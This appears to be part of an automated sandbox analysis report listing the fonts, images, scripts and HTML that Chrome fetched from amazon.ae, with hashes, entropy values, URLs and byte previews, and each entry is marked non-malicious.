                                                                                                                                                                                                                                                                      MD5:4AFCD3B79B78D33386F497877A29C518
                                                                                                                                                                                                                                                                      SHA1:CC7EBAA05A2CD3B02C0929AC0475A44AB30B7EFA
                                                                                                                                                                                                                                                                      SHA-256:CDED49F94FC16DC0A14923975E159FBF4B14844593E612C1342C9E34E2F96821
                                                                                                                                                                                                                                                                      SHA-512:2DC9FFF1D57D5529C9C7BFF26FA9F3F94ADC47E9CEF51D782E55ECF93045200140706AB5816DFD4A0B49B8DB2263320FA2F0FA31A04E12D0C91FEA79B127255D
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/G/01/AUIClients/AmazonUIFont-amazonember_rg-cc7ebaa05a2cd3b02c0929ac0475a44ab30b7efa._V2_.woff2
                                                                                                                                                                                                                                                                      Preview:wOF2......@........l..@.........................?FFTM..8..z..@.`..~.....P..9.6.$..F..<.. ..,..a?webf....5l.F..VU..#7.Q...d......k...r....{.T....2KuI.1.+j...(..kvf8...7.+.&.....t..!Z..C...>..=.....v.9_.% .L.....z..........0.e....;.7>.d..S..[..&/....=.9w.n...=.FH.h$...<....s.s.F..`...c....@...}.MP.@.A`T+..J.,F..XT....@..c......TH....OZ..u.....V..u..g...#..~"...Df.\M..-...n.Cu..{f..@.b{B...x......2..;.B...Ah.).....m...Q`!V.IH.pG...T.mb..p.[.v....Z=..P...I.,....m....;..Hva.*..@..x..:.....=&'G. ..0.....Mi...LC...t6..N5..m.........TH.....mY#..g..#.$...7..}...cS{..!.'..n..3...0......lw..D.,l..x...hH.I..lZ.]...4h/..>-A...wAv....W..KeYj{.V[c..d...d/..1.g.(:..5......h.(;@..........0..]+my.qdQ.>..JGu5.v2.3/.)..h.I2.P.. ....P..l......UU..#.d......R..x...)..d...2.....ov..%'..R5.97jA.._...m#..:.Z..r..5.!1.a.`..o.\<.4..j..._.......+Y)E......."A$..-._........c.C-.\....C../C..>..;T.@K...aB.o}t.>..~...>............uP|..\|.....1.. x....-%.....<>.$M..(..e......Un.rf0
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):6016
                                                                                                                                                                                                                                                                      Entropy (8bit):7.830805104159852
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TkBKM3uUSAb4+f7L57xOxrJa254kFLnHv/8307ZC8acPYxiEkou6cG6ZqXug9nuC:oIM+UaKEJak4aLn8307Z7ZYPkoRcUuCn
                                                                                                                                                                                                                                                                      MD5:5EF8B928F942079A8485B15870E010D3
                                                                                                                                                                                                                                                                      SHA1:0F831076A5F877318504E4FD9640BAD1EC72CC35
                                                                                                                                                                                                                                                                      SHA-256:4F3A387165C1FF2ED0A2B7771ADE5BE4A8CCEC815652DAFE94147047BCEC5210
                                                                                                                                                                                                                                                                      SHA-512:AD7F196D985D7377C71441E96731EB3FD85D14ABE3289A9FB64EE9E0AA70ACC53A1A4CB5A9973D3D2342BB883438469533BE360F6D2EA88046C4F3146A696F46
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."........../...........................................................................@.Ln]...yq.!s..o#N+..5.g..w.......#V....T.z@..(9.`...F.n../Nt{e.........J.).W.....J9..@.kl.[.#{@.....4.u...v.M..bI..1.<.1.l.1.....s....:...0.....b..C9..>X......~{..2....cL...le.Kg]7......y..F.kvL6;."\.[.....B.....I\.=.;.........bg.C:?+T..%f.E.1p.as.B.[.....)...........\.6....m|..rj..........i.{...o=......:.+..@.z...J.B...E.. .!{..E..RM..0.}.......l.-4.........<...)..Z.,81..X.c77.. ......&.9_'...I.o$..{.6s..F..m}..p.O.CH........=.....e.......v..C..b`...J7.o.{X.G..>&~b....||..Q..a...........-...........................!@. "#1A.3.20PQ`.............Nm......1..........|`.d....5...uJ.Q.+.Gq.2m.o...../....5@U....!.p...T...r...K%-..J[v...>.k7....mT...teP.N-&.5xgLE....3;..q.....^ZAv&.$'.V........z.E...0.-
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 302x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):28989
                                                                                                                                                                                                                                                                      Entropy (8bit):7.981294849225469
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:z9qTOjdq8YRl1JB1bTFa/YOGz6mMOWYESOdxAPFz:JvUTD1Y/YvFEoP5
                                                                                                                                                                                                                                                                      MD5:6C1E3034587C88596DB30CEEE25F7BEB
                                                                                                                                                                                                                                                                      SHA1:C4EE187EFFAB6B89B9BB7109A28804F3CD8E69E4
                                                                                                                                                                                                                                                                      SHA-256:7EF4E0131A0E83A2F54AC080C38B998B140A0C8275EAFFAA28304932E76C3EA4
                                                                                                                                                                                                                                                                      SHA-512:DA9D39A40E0A4F7B701DE6A85B1C6F1DDC87EA1BDED830603348B3E2CECFB05ADB0B2136029D00B9150F96A4337A6349C3B5BF4CED5665E1ECFE7BEAF70E02BD
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61aTQubT0LL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5..................................................................i I I I I I I I I M...u...5.!.$.$.$.$.$./.A....R..x...N..a.....b..=.qs.R>....i.:r....~../.6}{...........r.7.U..y.c-.gc.-^.pH...........t.......j-.....+.l...S.........<.O...MFo..k....az....Z.}aq.E....&...].R=...Po.-.._..jY;.....$D!..)..2a..s...P..`!.m...b........[...U...V..q?..mn9.......=..*I.KSK..W..._~{.>..z.).k..s.o.....E!......$K..W`H...H.r........+../.[,.c.../.$.!.H..K.o.x.....V....ijSd........<[..>C.. %...s..0a.X..vwiKM..u.-JI.I.I.6!g...H..7..$.f=.d[[....4z..2Qh...}|.)....".XU.M.<.......>VVh..z.G.......9Y..{.....iy...Z...d......Pa.Pa.)....9.[...p.......M.0........a.....Y.$.Y.....|.(.=.^..D.D%#=...].....G.a./...cc~..@.@.A\..._./#.9aNZ..}...W.RF.....q:.*.YHm.m.5.q.do....pT..W.s..Kg[..PexLB..2>...y.....\-..1)...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (36389), with no line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):36390
                                                                                                                                                                                                                                                                      Entropy (8bit):5.337131075186544
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:2wbInw/BNHqbqilifGNfBBETgxCpQE0TXQaIith9qDO1nsnQVw1lGPCyVG5+opqv:55kbH6sDQablGQqgQ5q+iwI8VTB7WN
                                                                                                                                                                                                                                                                      MD5:0F728C1F84131990966B870B499E472A
                                                                                                                                                                                                                                                                      SHA1:9AE54840085067B8EFAE8843733EB594D4F28B0E
                                                                                                                                                                                                                                                                      SHA-256:B07B169C63F5A286E4A9F0368CEF3C86BC43987CDE3AE4D848B8548E7E15F605
                                                                                                                                                                                                                                                                      SHA-512:76A22A9471D7F57219F11676C750505019AC561C7E288424C66094AF12AA854E20024D6EA07E686F798EAEC52A142D5FED921B9634133B1D5D21AACF1C5454FE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:"use strict";var _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t};!function(n){var r={};function o(t){if(r[t])return r[t].exports;var e=r[t]={i:t,l:!1,exports:{}};return n[t].call(e.exports,e,e.exports,o),e.l=!0,e.exports}o.m=n,o.c=r,o.d=function(t,e,n){o.o(t,e)||Object.defineProperty(t,e,{configurable:!1,enumerable:!0,get:n})},o.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return o.d(e,"a",e),e},o.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},o.p="",o(o.s=60)}([function(t,e){t.exports="undefined"!=typeof window&&window.Math==Math?window:"undefined"!=typeof self&&self.Math==Math?self:Function("return this")()},function(t,e,n){var r=n(28)("wks"),o=n(43),i=n(0).Symbol,c=n(98);t.exports=function(t){return r[t]||(r[t]=c&&i[t]||(c?i:o)("Symbol."+t))}},function(t,e,n){e.a=f
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:SX0TR1HXR3TVBG1JQK3B$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3DSX0TR1HXR3TVBG1JQK3B%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D8171%26pc%3D12400%26at%3D12400%26t%3D1724264979240%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D11601212031%26tid%3DSX0TR1HXR3TVBG1JQK3B%26aftb%3D1%26lob%3D1:12399
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 160x158, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):1778
                                                                                                                                                                                                                                                                      Entropy (8bit):7.887619929593625
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:Ea2n46oWYsNZR5TN5VBM7PtBwZUS7OBL0qh:Px6xYsNTN5s7PwaSAwqh
                                                                                                                                                                                                                                                                      MD5:CBE743836DB01FC533119F4CA9F8AB0A
                                                                                                                                                                                                                                                                      SHA1:9AD1A2DE0902EB7E4F5A209B58EE45612DA2F5B1
                                                                                                                                                                                                                                                                      SHA-256:CD48F0E87ABA9A54BCB869028BF112AF97F7D3CEB0985847A864EAA6DD1BB6EA
                                                                                                                                                                                                                                                                      SHA-512:C50A92E2D368626ECF37CB249AC7D8E2B8CC694E3F4CE5612D6CAC1A4B54B082C7AC4A4620D029CF21921AC3AE582148FF873DF7E29F9314E29015C757456858
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81BY-cAOlCL._AC_QL10_SX160_SY600_FMwebp_.jpg
                                                                                                                                                                                                                                                                      Preview:RIFF....WEBPVP8 ....P,...*....?...[.)..%.\I.1....-.........9....?.l....~g......Q....8W2..3C.^.tfn.....?v2.c..0..........Y..@.h...Uc"]9.a.o.^.Q.0..n.tvK.W.;...n......Q....Z.H......!...[..be.RBu.?l%..,...&.U...C...*...6....D..>I.. ..8].x.......p{P;..&#P...>..e..u..?X....o...D.C....&....d...z._i....:..\.3.\.J\|......FRy..V"..F....m..R.........hmj...?...H..i.........f.....g.H.'. j7&.:r..u.........lC...f(..J...\R...h.6..br..'.....#.E.....1...y..q.3A+.J...D..;.z...%j...Nx..u}.A..J..W........j`......o...rn.%..k.`.[&.<.0.\...:.~.I....:..<..>>.}<...#=..u.tF]...V.@...g..88x..f.X..e.]...!....\..:.o.NR..0...N\.6.9_3i*..'S...^c.......{.{5.h.A..A..B.D.;n...9........"..w....I....f..^bwS.;..Y..>..,....O...M.j..:.g..A..Du-.?.6O2E..b.ie...s..h...zS..X2.. Jh.m..<.o.(..U...p..{.....b..C.d.%..p.._-."L.B8.#^.].i:D<..b.{.........IH....V.7.LT..6~l..$H.@..F..~t;..U.;..P Z0V.iv.n..j...........".`)...pSTsB.f..X...;.!.}k....".HA..a.9..Cg.<..}r.....\Z.915(_
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 135x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):6869
                                                                                                                                                                                                                                                                      Entropy (8bit):7.938812725383721
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:jbl803vV81eti/W3Psbd7jxAmvtctp5yyF:jblLV81eti/WUPlvt+f1
                                                                                                                                                                                                                                                                      MD5:BCD5B7CAAF59AB38ED7DD9B9F1EF0829
                                                                                                                                                                                                                                                                      SHA1:82DFBAE570BA18F2EF231F0035BCD55F99F87EE6
                                                                                                                                                                                                                                                                      SHA-256:F11BFD9C69F7B76BFD491B87F523F0E6167688151CC2D333C479EDB75525CEC6
                                                                                                                                                                                                                                                                      SHA-512:DAB7A29AD60BCE29CF5667F423CEB7A4AA6DA8BCF65FAB885687151F42117FA6C802DA54D3150CA6A39FD5F56C4361DA7373691F1B6E00468A773C02D3022DBB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1..AQ."aq..2Br...#3RS......T....$4Cbst......5..................................................!...1A"QR.2.....#aq.............?..(..(.....(....x&...G y......(.kW.u.(l.x.:?}r..q.......!+....;..2...k....'S.....-C.q...K..w:.+....?....%.G.m...^.[>..y%I..6..Zo.C~.p.!4.;.@..."....L.odj.^..O. ..gb...&..-....*...U.3.#..............C..S...u...B.A.......3[)........k.Z..QE..E.P..Q@.QE.QE..D.,J...T.X...RMF.g...@..O.['2Jk.;_..W.....O.U.ZE...g....`.N.W.i.#.;S.C.K.h7.>.V.q...HA....;.,6k.....hV6.g....bY6!*.r..P..._GgAD....R"..x.z...M7^.EDX.s.....5)..m...-....iE.$Q].r_....S..d..F....>}n.....:..+.e#..._v8.....Skv..M..).c*e~........C..}...O...KK;7/n!.$W......eO.U*....X\:0.....G...........[l[I....P"c.V7f.g.vT........!=.6.......9.....s..TG.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (7131)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):644411
                                                                                                                                                                                                                                                                      Entropy (8bit):5.718497735506057
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:12288:5+kpyNLO0ZRRMNIs2W0cRsl+P+dlAlLFW9bzfewQurTb1hoPa+R7/Iit150nJd9s:IwyNLO4RMNI9W0cRsl+P+dlAlLFW9WwM
                                                                                                                                                                                                                                                                      MD5:99F7496649A2F84D8B0C9553EDD53BD1
                                                                                                                                                                                                                                                                      SHA1:D7A10ABBA954506B0F03017271056E4B9E779671
                                                                                                                                                                                                                                                                      SHA-256:CDECA96531E723862638E2E2653719990D95F2857749541A73860CCCD30289F7
                                                                                                                                                                                                                                                                      SHA-512:4FB87623D7FEAA38E24A4B39E4908318C098E7141551404970D5F670F42C7976AC41BE9A646049F890AB02AE24B130815E72996A3BDC6175C6B7F12DFA0E3E2D
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Preview:<!doctype html><html lang="en-ae" class="a-no-js" data-19ax5a9jf="dingo"> sp:feature:head-start -->.<head><script>var aPageStart = (new Date()).getTime();</script><meta charset="utf-8"/>. sp:end-feature:head-start -->. sp:feature:csm:head-open-part1 -->..<script type='text/javascript'>var ue_t0=ue_t0||+new Date();</script>. sp:end-feature:csm:head-open-part1 -->. sp:feature:cs-optimization -->.<meta http-equiv='x-dns-prefetch-control' content='on'>.<link rel="dns-prefetch" href="https://images-eu.ssl-images-amazon.com">.<link rel="dns-prefetch" href="https://m.media-amazon.com">.<link rel="dns-prefetch" href="https://completion.amazon.com">. sp:end-feature:cs-optimization -->. sp:feature:csm:head-open-part2 -->.<script type='text/javascript'>.window.ue_ihb = (window.ue_ihb || window.ueinit || 0) + 1;.if (window.ue_ihb === 1) {..var ue_csm = window,. ue_hob = +new Date();.(function(d){var e=d.ue=d.ue||{},f=Date.now||function(){return+new Date};e.d=function
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (595)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):52976
                                                                                                                                                                                                                                                                      Entropy (8bit):5.315043781142496
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:/OwplOVh9aGPNItQPtazaikxMXXPB+YQycmcUOzheEfbTAYfnrIulbsksLZHU:Y9kXcmmzhe4vJrPsks6
                                                                                                                                                                                                                                                                      MD5:08ADE75238D50BE6B835CB9EB47F77BE
                                                                                                                                                                                                                                                                      SHA1:1283D0AD3A738552036F4AC495484DAB0E4F7C24
                                                                                                                                                                                                                                                                      SHA-256:D6F8F9D8EEF0165B139120551326140D8693B6309A64E55FC40DE19BE21C614B
                                                                                                                                                                                                                                                                      SHA-512:10790BEA14F378A0722FD5D6CF5683C45A3F5DE253CB1BC25126A96BE70D5D83E7BF9029CB974C7F8B8C10A4FA537A3A09B9A5DB97CD69E9A937EFF271F841D6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/51BqsgbDI7L.js?AUIClients/CardJsRuntimeBuzzCopyBuild
                                                                                                                                                                                                                                                                      Preview:(function(V){var f=window.AmazonUIPageJS||window.P,M=f._namespace||f.attributeErrors,a=M?M("CardJsRuntimeBuzzCopyBuild",""):f;a.guardFatal?a.guardFatal(V)(a,window):a.execute(function(){V(a,window)})})(function(V,f,M){mix_d("@c/api-lock",["exports"],function(a){var c={},d=function(a){delete c[a.type]};a["default"]={isLockedFor:function(a){return!a.every(function(a){return!!c[a]})},unlockForEvent:function(a,b){c[a.type]=a;try{var e=b();if(e instanceof Promise)return e.finally?e.finally(function(){return d(a)}):.e.then(function(){return d(a)},function(b){d(a);throw b;});d(a)}catch(k){throw d(a),k;}return Promise.resolve()},unlockForEventOnce:function(a){c[a.type]=a},resetLocks:function(){Object.keys(c).forEach(function(a){return d(c[a])})}};a.initialize=function(a,b,c){};Object.defineProperty(a,"__esModule",{value:!0})});mix_d("@c/aui-untrusted-ajax",["exports","tslib","@p/a-ajax","@c/guard"],function(a,c,d,e){function b(a){return a&&"object"===typeof a&&"default"in a?a:{"default":a}}fun
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (11115), with no line terminators
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):11115
                                                                                                                                                                                                                                                                      Entropy (8bit):5.337650855535322
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1pbJWreb26qpOaby4gajwJeY1WOO5wKZBBOlIY44Bqb/tS:Mreb2thY5STJbQ
                                                                                                                                                                                                                                                                      MD5:BF4E1F374BB39E19D3D0E4FDEC6B1262
                                                                                                                                                                                                                                                                      SHA1:033CBD9D3A22FEA4F68382D2EA288F02AE49D44C
                                                                                                                                                                                                                                                                      SHA-256:9ECC35EB2B04506198971EA8AE65DAAABB0E722A6BBC0950719B19B69FD4B043
                                                                                                                                                                                                                                                                      SHA-512:C148107964C11BD6AFAB3D585EB4C60B7CC813F6B53B36CDA251E8BA086FA613220E70EF471D0204DB128C8478C00DDDA22655D28EDF79A45A06931B8B2EA0AD
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/31N-r+VYSWL.js
                                                                                                                                                                                                                                                                      Preview:var DACXImageTemplateCreative=function(e){var n={};function t(r){if(n[r])return n[r].exports;var o=n[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.r=function(e){Object.defineProperty(e,"__esModule",{value:!0})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,n){return Object.prototype.hasOwnProperty.call(e,n)},t.p="",t(t.s=15)}([function(e,n,t){"use strict";var r="undefined"!=typeof MSFClient&&MSFClient;n.a=r},function(e,n,t){"use strict";t.r(n),t.d(n,"readStringFromCookie",function(){return u}),t.d(n,"writeString",function(){return i}),t.d(n,"readString",function(){return a}),t.d(n,"write",function(){return c}),t.d(n,"read",function(){return f}),t.d(n,"isSupported",function(){return l});var r=864e5,o=365;function u(e,n){var t=function(e){if("string"!=typeo
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4238
                                                                                                                                                                                                                                                                      Entropy (8bit):7.704720238700568
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:R9+0YkxK07wxusjK47D0fo6LBySHzUUcdVCDbjux+z:e0wFz6LByhUC+nuk
                                                                                                                                                                                                                                                                      MD5:E085596AD1756B346493432818245583
                                                                                                                                                                                                                                                                      SHA1:499B90D2BCF4AF80F68AEEEE3A63044410AE70E1
                                                                                                                                                                                                                                                                      SHA-256:7ED66F86F3E12C85F976D5FEE535B26EF0EB45BCA3E6D32D985E44FC2E42FE20
                                                                                                                                                                                                                                                                      SHA-512:0396935B35D79CEDAE2164C64BED24A9E7118DB548C171B41D8E1AB8522F66B68543F1C8F1690432ED0B3C8324FAB752B0D5A69A2535EEAA8FF9BF29294FE7A9
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_21_BTS24_AE_GW_QC-CROSSA_DQC_CL_BeautyAppliances_186x116_EN._SY116_CB566993070_.jpg
                                                                                                                                                                                                                                                                      Preview:......Exif..II*.................Ducky.......(......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:6C265640478A11EFBAE58FF32B0F82A0" xmpMM:InstanceID="xmp.iid:6C26563F478A11EFBAE58FF32B0F82A0" xmp:CreatorTool="Adobe Photoshop 2024 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="7432AE9D7C846B33C16FC475697925A7" stRef:documentID="7432AE9D7C846B33C16FC475697925A7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d...................b....................................................$$''$$53335;;;;;;;;;;.............................%......% #...# ((%%
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3914
                                                                                                                                                                                                                                                                      Entropy (8bit):7.719265662082426
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:T5fTEsQOpQeNNOeKR2OsCsJ3o7RKJb/AZee3oPNlqGsEn:9fnQ4fRW29J3IRxZeeYPLsEn
                                                                                                                                                                                                                                                                      MD5:BC77D0B7A0050AB9DC9563FDF4B3F3F7
                                                                                                                                                                                                                                                                      SHA1:A540EAA725361E2AF5F2D39438D64836621992A6
                                                                                                                                                                                                                                                                      SHA-256:77FCDE3A88D75DD46D52B052AB7A45F697C156B2F2E0DBA85041E378A5425A9F
                                                                                                                                                                                                                                                                      SHA-512:B2842A7414DAB0C46073DED89D0E1B1343E4AE0542EE24A7B162F57697BDDFA5743CDFABCB0BFAC23B867F0A70631BCF02F677232B7F07F2CFB29A26433D7DF8
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/31+hYY59fPL._SR240,220_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........2...............................................................,..............F..b%.,D.%.M1?@:....Ac..rr....../:|PQ...U..._(-.......O1.XN@U...].RE.O.?{b......+._..Oh...Y.I..;...q..?"i.p..D...q&wx}....&.. .....v#....o..t.T./...l..ZzL'...+.....gRy.&.d.d:......8.....w.;.pq.N.'..F...x....jc+...f............6...=.)..(....4+".V7CQk......j.~.uU.X.......).s..h.......^O1....j._e9.B.......^.v.........5.y<...@...J!....[.....efB.G*.=\..........`.y#.1..U..X;...\...dOH...~,R..........5...h.....8..mg....m.|27`...|-^.~.+.........;.....0.2.1G..L}..6z.ty.`.|.>}..?c..#.ep.....................................................!01... 2.."3..ABQ#`p............a$72x..]N...]N...]N.uj`..".T..R..H..".T..b..5..j..!._.dg.Ei*.$..[S.....)O..".,..~{.4..$.....|.f..,.d... .N...QWV..n.1H.9.....E.bX.(.1.=z..'G.4
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 171x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):10570
                                                                                                                                                                                                                                                                      Entropy (8bit):7.961545667809982
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:TmTNafu4r6xNS1ngU0Wfsr3d6/d2WPJZXx+2kXlhOl12OgobmlNr:6Tgn6HSftuNOsUVkKlAOJbYF
                                                                                                                                                                                                                                                                      MD5:2500F63A19DA721A1F6A97C110642CC0
                                                                                                                                                                                                                                                                      SHA1:1E250F03A798FB73EBF182A0E92A010BA572CCF1
                                                                                                                                                                                                                                                                      SHA-256:1A7790F479695CA7BB532CB3A98DB0724D459CA02D4F6A4518A1CB60D30B1E44
                                                                                                                                                                                                                                                                      SHA-512:C9864C1D7D898CBE53A872C7C44783A3431C25B1DE55EEB0572F11C79B64FCD50302ACD6026871F18ECE8C09A4D2125425522FD532736CCCA7B148098F98A19B
                                                                                                                                                                                                                                                                      Malicious:false
